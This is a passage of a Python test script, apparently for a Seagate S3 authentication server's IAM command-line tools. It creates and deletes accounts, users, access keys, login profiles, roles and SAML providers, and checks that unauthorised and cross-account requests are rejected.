test_msg = 'Delete access key for changePasswordUserLoginProfileTestUser'
result = AuthTest(test_msg).delete_access_key(**user_access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete access key for TestUser'
result = AuthTest(test_msg).delete_access_key(**test_user_access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User changePasswordUserLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "changePasswordUserLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'Delete User TestUser'
user_args = {}
user_args['UserName'] = "TestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'create account login profile should succeed.'
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = false, AccountName = [\s\S]*"
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="s3test"
user_args['Password'] = "abcdiu"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'create account login profile should fail for already created profile.'
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="s3test"
user_args['Password'] = "abcdiu"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("The request was rejected because it attempted to create or update a resource that already exists")
test_msg = 'create account login profile should fail for exceeding max allowed password length.'
user_args = {}
maxPasswordLength = "abcdefghijklmnopqrstuvwxyzabcdefghijkabcdefghijklmnopqrstuvwxyzabcdefghijkabcdefghijklmnopqrstuvwxyzabcdefghijk\
abcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrstuvwxyzabcdefghijkjabcdefghijklmnopqrddd";
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="s3test"
user_args['Password'] = maxPasswordLength;
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create Account login profile")
test_msg = 'create account login profile should fail for empty account name.'
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="\"\""
user_args['Password'] = "abcdriu"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Account name is required")
test_msg = 'create account login profile should fail for account missing name.'
user_args = {}
account_name_flag = ""
password_flag = "--password"
user_args['AccountName'] =""
user_args['Password'] = "abcdriu"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Account name is required")
test_msg = 'create account login profile should fail for password missing.'
user_args = {}
account_name_flag = "-n"
password_flag = ""
user_args['AccountName'] ="abcd"
user_args['Password'] = ""
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test(negative_case=True)
result.command_response_should_have("Account login password is required")
test_msg = "Create account s3test_loginprofile0"
account_args = {'AccountName': 's3test_loginprofile', 'Email': 's3test_loginprofile@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements1 = get_response_elements(result1.status.stdout)
test_msg = "Create User accountLoginProfileTestUser"
user_args = {'UserName': 'accountLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is accountLoginProfileTestUser)'
access_key_args = {}
access_key_args['AccountName'] = 'accountLoginProfileTestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'CreateAccountLoginProfile should fail when tried with IAM User accessKey-secretKey'
user_name_flag = "-n"
password_flag = "--password"
access_key_args['AccountName'] ="s3test_loginprofile0"
access_key_args['Password'] = "newPassword"
result = AuthTest(test_msg).create_account_login_profile(user_name_flag , password_flag,\
**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action.")
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User accountLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "accountLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = "Create account s3test_loginprofile1"
account_args = {'AccountName': 's3test_loginprofile1', 'Email': 's3test_loginprofile1@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements1 = get_response_elements(result1.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "s3test_loginprofile1"
access_key_args['AccessKeyId'] = account_response_elements1['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements1['SecretKey']
test_msg = "Create account s3test_loginprofile2"
account_args = {'AccountName': 's3test_loginprofile2', 'Email': 's3test_loginprofile2@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result2 = AuthTest(test_msg).create_account(**account_args).execute_test()
result2.command_should_match_pattern(account_response_pattern)
account_response_elements2 = get_response_elements(result2.status.stdout)
test_msg = "Attempt: create account-login-profile for account name - s3test_loginprofile1 and access key of account s3test_loginprofile2 - Should fail."
access_key_args2 = {}
access_key_args2['AccountName'] = "s3test_loginprofile1"
access_key_args2['AccessKeyId'] = account_response_elements2['AccessKeyId']
access_key_args2['SecretAccessKey'] = account_response_elements2['SecretKey']
access_key_args2['Password'] = "newPassword"
result = AuthTest(test_msg).create_account_login_profile(user_name_flag , password_flag,\
**access_key_args2).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
account_args = {}
test_msg = "Delete account s3test_loginprofile1"
account_args = {'AccountName': 's3test_loginprofile1', 'Email': 's3test_loginprofile1@seagate.com', 'force': True}
s3test_access_key = S3ClientConfig.access_key_id
s3test_secret_key = S3ClientConfig.secret_key
S3ClientConfig.access_key_id = access_key_args['AccessKeyId']
S3ClientConfig.secret_key = access_key_args['SecretAccessKey']
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
account_args = {}
test_msg = "Delete account s3test_loginprofile2"
account_args = {'AccountName': 's3test_loginprofile2', 'Email': 's3test_loginprofile2@seagate.com', 'force': True}
S3ClientConfig.access_key_id = access_key_args2['AccessKeyId']
S3ClientConfig.secret_key = access_key_args2['SecretAccessKey']
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
S3ClientConfig.access_key_id = s3test_access_key
S3ClientConfig.secret_key = s3test_secret_key
test_msg = 'GetAccountLoginProfile Successfull'
account_args = {}
account_name_flag = "-n"
account_args['AccountName'] ="s3test"
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = (true|false), AccountName = [\s\S]*"
result = AuthTest(test_msg).get_account_login_profile(account_name_flag , **account_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'UpdateAccountLoginProfile Successfull'
account_args = {}
account_name_flag = "-n"
password_flag = "--password"
account_args['AccountName'] ="s3test"
account_args['Password'] ="s3test456"
account_profile_response_pattern = "Account login profile updated."
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **account_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'UpdateAccountLoginProfile Successfull with ldap credentials'
account_args = {}
account_name_flag = "-n"
password_flag = "--password"
account_args['AccountName'] ="s3test"
account_args['Password'] ="s3test4567"
account_args['AccessKeyId'] = S3ClientConfig.ldapuser
account_args['SecretAccessKey'] = S3ClientConfig.ldappasswd
account_profile_response_pattern = "Account login profile updated."
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **account_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = "Create account s3test_loginprofile_update"
account_args = {'AccountName': 's3test_loginprofile_update', 'Email': 's3test_loginprofile_update@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements1 = get_response_elements(result1.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "s3test_loginprofile_update"
access_key_args['AccessKeyId'] = account_response_elements1['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements1['SecretKey']
access_key_args['Password'] = "abcdoy"
test_msg = "create account-login-profile for account name - s3test_loginprofile_update with PasswordResetRequired - false."
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = false, AccountName = [\s\S]*"
account_name_flag = "-n"
password_flag = "--password"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**access_key_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'UpdateAccountLoginProfile should succeed with PasswordResetRequired set to true'
account_name_flag = "-n"
password_flag = "--password"
access_key_args['PasswordResetRequired'] ="True"
account_profile_response_pattern = "Account login profile updated."
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **access_key_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = 'GetAccountLoginProfile Successfull'
account_name_flag = "-n"
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = true, AccountName = [\s\S]*"
result = AuthTest(test_msg).get_account_login_profile(account_name_flag , **access_key_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
test_msg = "Create User updateAccountLoginProfileTestUser"
user_args = {'UserName': 'updateAccountLoginProfileTestUser'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is accountLoginProfileTestUser)'
access_key_args = {}
access_key_args['AccountName'] = 'updateAccountLoginProfileTestUser'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
access_key_args['AccountName'] = 's3test_loginprofile_update'
test_msg = 'UpdateAccountLoginProfile should fail for unauthorized user'
access_key_args['Password'] = "abcd"
account_name_flag = "-n"
password_flag = "--password"
result = AuthTest(test_msg).update_account_login_profile(account_name_flag, password_flag, **access_key_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action.")
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User updateAccountLoginProfileTestUser'
user_args = {}
user_args['UserName'] = "updateAccountLoginProfileTestUser"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = "Create User getaccountloginprofiletest"
user_args = {'UserName': 'getaccountloginprofiletest'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key'
account_args = {}
account_args['UserName'] = 'getaccountloginprofiletest'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**account_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
account_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
account_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
test_msg = 'GetAccountLoginProfile should fail when tried with IAM User accessKey-secretKey'
account_name_flag = "-n"
account_args['AccountName'] ="s3test"
result = AuthTest(test_msg).get_account_login_profile(account_name_flag , **account_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action.")
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**account_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User getaccountloginprofiletest'
user_args = {}
user_args['UserName'] = "getaccountloginprofiletest"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'List Users (path prefix = /test/)'
user_args = {'PathPrefix': '/test/'}
list_user_pattern = "UserId = [\w-]*, UserName = s3user1New, ARN = [\S]*, Path = /test/success/$"
result = AuthTest(test_msg).list_users(**user_args).execute_test()
result.command_should_match_pattern(list_user_pattern)
test_msg = "List Users - Take access key and secret key from config"
new_config_entries = {'SG_ACCESS_KEY' : S3ClientConfig.access_key_id, 'SG_SECRET_KEY': S3ClientConfig.secret_key}
update_config_yaml(new_config_entries)
list_user_pattern = "UserId = [\w-]*, UserName = s3user1New, ARN = [\S]*, Path = /test/success/$"
result = AuthTest(test_msg).list_users(**user_args).execute_test()
result.command_should_match_pattern(list_user_pattern)
restore_config_yaml()
test_msg = "List users - Take access key and secret key from env"
_use_root_credentials()
# Declare SG_LDAP_USER and SG_LDAP_PASSWD environment variables
os.environ['SG_ACCESS_KEY'] = S3ClientConfig.access_key_id
os.environ['SG_SECRET_KEY'] = S3ClientConfig.secret_key
user_args = {'PathPrefix': '/test/'}
list_user_pattern = "UserId = [\w-]*, UserName = s3user1New, ARN = [\S]*, Path = /test/success/$"
result = AuthTest(test_msg).list_users(**user_args).execute_test()
result.command_should_match_pattern(list_user_pattern)
# Remove environment variables declared above
os.environ.pop('SG_ACCESS_KEY')
os.environ.pop('SG_SECRET_KEY')
#TODO - Need to fix this test. Currently skipping this test as it waits for password to be entered manually through prompt.
'''
test_msg = "List users - Take access key and secret key from prompt"
user_args = {'PathPrefix': '/test/'}
list_user_pattern = "Enter Access Key: Enter Secret Key: UserId = [\w-]*, UserName = s3user1New, ARN = [\S]*, Path = /test/success/$"
stdin_values = S3ClientConfig.access_key_id + '\n' + S3ClientConfig.secret_key
S3ClientConfig.access_key_id = None
S3ClientConfig.secret_key = None
result = AuthTest(test_msg).list_users(**user_args).execute_test(False, False, stdin_values)
result.command_should_match_pattern(list_user_pattern)
'''
_use_root_credentials()
test_msg = 'Reset s3user1 user attributes (path and name)'
user_args = {}
user_args['UserName'] = "s3user1New"
user_args['NewUserName'] = "s3user1"
user_args['NewPath'] = "/"
result = AuthTest(test_msg).update_user(**user_args).execute_test()
result.command_response_should_have("User Updated.")
test_msg = 'Delete User s3user1'
user_args = {}
user_args['UserName'] = "s3user1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = "Create User s3user2 (path = /test/)"
user_args['UserName'] = "s3user2"
user_args['Path'] = "/test/"
user2_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user2_response_pattern)
test_msg = 'Delete User s3user2'
user_args['UserName'] = "s3user2"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'Update User root (new name = s3root) should fail'
user_args = {}
user_args['UserName'] = "root"
user_args['NewUserName'] = "s3root"
result = AuthTest(test_msg).update_user(**user_args).execute_test(negative_case=True)
result.command_response_should_have("Cannot change user name of root user")
test_msg = 'Update User root (new path - /test/success)'
user_args = {}
user_args['UserName'] = "root"
user_args['NewPath'] = "/test/success/"
result = AuthTest(test_msg).update_user(**user_args).execute_test()
result.command_response_should_have("User Updated.")
test_msg = 'List Users (default path)'
user_args = {}
result = AuthTest(test_msg).list_users(**user_args).execute_test()
result == ""
test_msg = 'Reset root user attributes (path and name)'
user_args = {}
user_args['UserName'] = "root"
user_args['NewPath'] = "/"
result = AuthTest(test_msg).update_user(**user_args).execute_test()
result.command_response_should_have("User Updated.")
# Test create user API
# Each user can have only 2 access keys. Hence test all the APIs in the same function.
def accesskey_tests():
access_key_args = {}
test_msg = 'Create access key (user name not provided)'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
test_msg = 'Delete access key'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Create access key (user doest not exist.)'
access_key_args = {}
access_key_args['UserName'] = 'userDoesNotExist'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_response_should_have("Failed to create access key.")
test_msg = 'Create access key (user name is root)'
access_key_args['UserName'] = 'root'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
test_msg = 'Create access key (Allow only 2 credentials per user.)'
access_key_args['UserName'] = 'root'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to create access key.")
test_msg = 'Delete access key (user name and access key id combination is incorrect)'
access_key_args['UserName'] = 'root3'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("Failed to delete access key.")
test_msg = 'Update access key for root user should fail(Change status from Active to Inactive)'
access_key_args['Status'] = "Inactive"
access_key_args['UserName'] = 'root'
result = AuthTest(test_msg).update_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("Access key status for root user can not be changed")
test_msg = 'Delete access key'
access_key_args['UserName'] = 'root'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
# List the acess keys to check for status change
test_msg = 'List access keys'
access_key_args['UserName'] = 'root'
accesskey_response_pattern = "UserName = root, AccessKeyId = [\w-]*, Status = Active$"
result = AuthTest(test_msg).list_access_keys(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
user_args = {}
user_args['UserName'] = "s3user1"
test_msg = "Create User s3user1 (default path)"
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is s3user1)'
access_key_args = {}
access_key_args['UserName'] = 's3user1'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
test_msg = 'Update access key (Change status from Active to Inactive)'
access_key_args['Status'] = "Inactive"
access_key_args['UserName'] = 's3user1'
result = AuthTest(test_msg).update_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key Updated.")
test_msg = 'List access keys (Check if status is inactive.)'
access_key_args['UserName'] = 's3user1'
result = AuthTest(test_msg).list_access_keys(**access_key_args).execute_test()
result.command_response_should_have("Inactive")
test_msg = 'Delete access key'
access_key_args['UserName'] = 's3user1'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User s3user1'
user_args = {}
user_args['UserName'] = "s3user1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
# Check if non root users are not allowed to use own access key
# and secret key on other users for creating and deleting access keys
'''
Setup for tests:
'''
_use_root_credentials()
user_args = {}
test_msg = "Create User s3user_1 using root access key and secret key " \
+ "(path = /test/)"
user_args['UserName'] = "s3user_1"
user_args['Path'] = "/test/"
user2_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user2_response_pattern)
test_msg = "Create access key using root access key and secret key " \
+ "(user name is s3user_1)"
access_key_args['UserName'] = 's3user_1'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
response_elements = get_response_elements(result.status.stdout)
# Saving access key and secret key for s3user_1 for later use.
access_key_id_of_s3user1 = response_elements['AccessKeyId']
secret_key_of_s3user1 = response_elements['SecretAccessKey']
# Overwriting values of access key and secret key given by
# _use_root_credentials() with s3user_1's access key and secret key.
S3ClientConfig.access_key_id = access_key_id_of_s3user1
S3ClientConfig.secret_key = secret_key_of_s3user1
'''
runTest:
'''
test_msg = "Create User s3user_2 using s3user_1's access key and secret key " \
+ "(path = /test/)"
user_args['UserName'] = "s3user_2"
user_args['Path'] = "/test/"
user2_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_user(**user_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
'''
Setup for tests:
'''
_use_root_credentials()
test_msg = "Create User s3user_2 using root's access key and secret key " \
+ "(path = /test/)"
user_args['UserName'] = "s3user_2"
user_args['Path'] = "/test/"
user2_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user2_response_pattern)
'''
runTest:
'''
test_msg = "Create access key using s3user_1's access key and secret key " \
+ "(user name is s3user_2)"
S3ClientConfig.access_key_id = access_key_id_of_s3user1
S3ClientConfig.secret_key = secret_key_of_s3user1
access_key_args['UserName'] = 's3user_2'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
'''
Setup for tests:
'''
_use_root_credentials()
test_msg = "Create access key using root access key and secret key " \
+ "(user name is s3user_2)"
access_key_args['UserName'] = 's3user_2'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
response_elements = get_response_elements(result.status.stdout)
# Saving access key and secret key for s3user_1 for later use.
access_key_id_of_s3user2 = response_elements['AccessKeyId']
secret_key_of_s3user2 = response_elements['SecretAccessKey']
# Overwriting values of access key and secret key given by
# _use_root_credentials() with s3user_2's access key and secret key.
S3ClientConfig.access_key_id = access_key_id_of_s3user2
S3ClientConfig.secret_key = secret_key_of_s3user2
'''
runTest:
'''
test_msg = 'Delete access key of s3user_1 using s3user_2\'s access key' \
+ ' and secret key'
access_key_args['UserName'] = 's3user_1'
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
'''
Setup for tests:
'''
_use_root_credentials()
test_msg = 'Delete access key of s3user_1 using root credentials'
access_key_args['UserName'] = 's3user_1'
access_key_args['AccessKeyId'] = access_key_id_of_s3user1
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
S3ClientConfig.access_key_id = access_key_id_of_s3user2
S3ClientConfig.secret_key = secret_key_of_s3user2
'''
runTest:
'''
test_msg = "Delete User s3user_1 using s3user_2's access key and secret key"
user_args['UserName'] = "s3user_1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test(negative_case=True)
result.command_response_should_have("User is not authorized to perform invoked action")
'''
Teardown:
'''
_use_root_credentials()
test_msg = 'Delete access key of s3user_2 using root access key and secret key'
access_key_args['UserName'] = 's3user_2'
access_key_args['AccessKeyId'] = access_key_id_of_s3user2
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User s3user_1 using root access key and secret key'
user_args = {}
user_args['UserName'] = "s3user_1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'Delete User s3user_2 using root access key and secret key'
user_args = {}
user_args['UserName'] = "s3user_2"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
'''
Setup for tests for scenario when one account's access key
and secret key are used for creating access key for user in aanother account :
'''
test_msg = "Create account s3test_1"
account_args = {'AccountName': 's3test_1', 'Email': 's3test_1@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
# Overwriting values of access key and secret key given by
# _use_root_credentials() with new account 's3test_1's access key and secret key.
S3ClientConfig.access_key_id = account_response_elements['AccessKeyId']
S3ClientConfig.secret_key = account_response_elements['SecretKey']
'''
runTest:
'''
test_msg = "Create access key using another account's access key and secret key " \
+ "(user name is s3user_2)"
access_key_args = {}
access_key_args['UserName'] = 's3user_2'
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test(negative_case=True)
#import pdb; pdb.set_trace()
result.command_response_should_have("The request was rejected because it " \
+ "referenced a user that does not exist.")
'''
Teardown:
'''
account_args = {}
test_msg = "Delete account s3test_1"
account_args = {'AccountName': 's3test_1'}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# restoring previous values for further tests
_use_root_credentials()
def role_tests():
policy_doc = os.path.join(os.path.dirname(__file__), 'resources', 'policy')
policy_doc_full_path = os.path.abspath(policy_doc)
test_msg = 'Create role (Path not specified)'
role_args = {}
role_args['RoleName'] = 'S3Test'
role_args['AssumeRolePolicyDocument'] = policy_doc_full_path
role_response_pattern = "RoleId = [\w-]*, RoleName = S3Test, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_role(**role_args).execute_test()
result.command_should_match_pattern(role_response_pattern)
test_msg = 'Delete role'
result = AuthTest(test_msg).delete_role(**role_args).execute_test()
result.command_response_should_have("Role deleted.")
test_msg = 'Create role (Path is /test/)'
role_args['Path'] = '/test/'
role_response_pattern = "RoleId = [\w-]*, RoleName = S3Test, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).create_role(**role_args).execute_test()
result.command_should_match_pattern(role_response_pattern)
test_msg = 'List role (Path is not given)'
role_args = {}
role_response_pattern = "RoleId = [\w-]*, RoleName = S3Test, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).list_roles(**role_args).execute_test()
result.command_should_match_pattern(role_response_pattern)
test_msg = 'List role (Path is /test)'
role_response_pattern = "RoleId = S3Test, RoleName = S3Test, ARN = [\S]*, Path = /test/$"
result = AuthTest(test_msg).list_roles(**role_args).execute_test()
result.command_should_match_pattern(role_response_pattern)
test_msg = 'Delete role'
role_args['RoleName'] = 'S3Test'
result = AuthTest(test_msg).delete_role(**role_args).execute_test()
result.command_response_should_have("Role deleted.")
def saml_provider_tests():
metadata_doc = os.path.join(os.path.dirname(__file__), 'resources', 'saml_metadata')
metadata_doc_full_path = os.path.abspath(metadata_doc)
test_msg = 'Create SAML provider'
saml_provider_args = {}
saml_provider_args['Name'] = 'S3IDP'
saml_provider_args['SAMLMetadataDocument'] = metadata_doc_full_path
saml_provider_response_pattern = "SAMLProviderArn = [\S]*$"
result = AuthTest(test_msg).create_saml_provider(**saml_provider_args).execute_test()
result.command_should_match_pattern(saml_provider_response_pattern)
response_elements = get_response_elements(result.status.stdout)
saml_provider_args['SAMLProviderArn'] = response_elements['SAMLProviderArn']
test_msg = 'Update SAML provider'
saml_provider_args = {}
saml_provider_args['SAMLProviderArn'] = "arn:seagate:iam:::S3IDP"
saml_provider_args['SAMLMetadataDocument'] = metadata_doc_full_path
result = AuthTest(test_msg).update_saml_provider(**saml_provider_args).execute_test()
result.command_response_should_have("SAML provider Updated.")
test_msg = 'List SAML providers'
saml_provider_response_pattern = "ARN = arn:seagate:iam:::S3IDP, ValidUntil = [\S\s]*$"
result = AuthTest(test_msg).list_saml_providers(**saml_provider_args).execute_test()
result.command_should_match_pattern(saml_provider_response_pattern)
test_msg = 'Delete SAML provider'
